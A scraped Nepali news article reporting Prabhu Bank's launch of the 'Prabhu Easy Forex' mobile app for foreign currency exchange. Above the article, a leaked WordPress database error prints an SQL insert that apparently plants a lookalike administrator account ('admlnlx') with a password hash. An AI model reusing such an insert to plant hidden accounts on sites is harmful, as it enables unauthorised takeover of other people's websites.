WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ14WOMjgeoPdWFhCS7ir8/o.cF9Lc/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:32:19', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ६ साउन, काठमाडौं । अन्तर्राष्ट्रिय विदेशी मुद्रा सटहीका लागि प्रभु बैंक लि ले मोबाइल एप्लिकेसन ‘प्रभु ईजी फोरएक्स’ सार्वजनिक गरेको छ ।
आज (सोमबार) राजधानीमा पत्रकार सम्मेलन गर्दै प्रभु बैंक ले नयाँ मोबाइल एप्लिकेसन सार्वजनिक गरेको हो ।
सहज रुपमा वैदेशिक मुद्रा आफ्नै मोबाइलबाट सटहीको सेवा प्रदान गर्ने उद्देश्यले आम सेवा ग्राहीहरु माझ प्रभु इजी फोरएक्स ल्याएको प्रभु बैंकले जनाएको छ । झण्झटिलो र लामो प्रकृयामा अन्तर्राष्ट्रिय मुद्रा सटही हुने प्रविधिलाई विस्तापित गर्दै नविन प्रविधिमार्फत मुद्रा सटहीलाई प्रविधिमैत्री तथा सरलीकृत गर्न मोबाइल एप ल्याएको कम्पनीले दाबी गरेको छ ।
अन्तर्राष्ट्रिय मुद्रा सटहीका लागि सेवा आवश्यक पर्नेहरुले सजिलै मोबाइल वा अनलाईनबाट आवेदन गर्न सक्ने छन् । त्यसका लागि प्रभु ईजी फोरएक्स मोबाइल एप मोबाइलमा उपलब्ध प्लेस्टोरबाट सजिलै डाउनलोड गर्न सकिन्छ भने एपस्टोरमा समेत चाडै नै उपलब्ध गराइने कम्पनीले जनाएको छ ।
मोबाइल एपमार्फत वैदेशिक मुद्रा सटहीका लागि अनलाइन आवेदन दिएको केहि समयभित्रै बैंकले एसएमएसमार्फत सटहीको कन्फर्मेसन प्रदान गर्छ । त्यसपछि आवेदकले आफ्नो अनुकूल समयमा तोकिएको शाखा तथा काउण्टरबाट सटही मुद्रा संकलन गर्न सक्ने छन् ।
https://gaulenews.com/?p=46997
https://gaulenews.com/?p=45848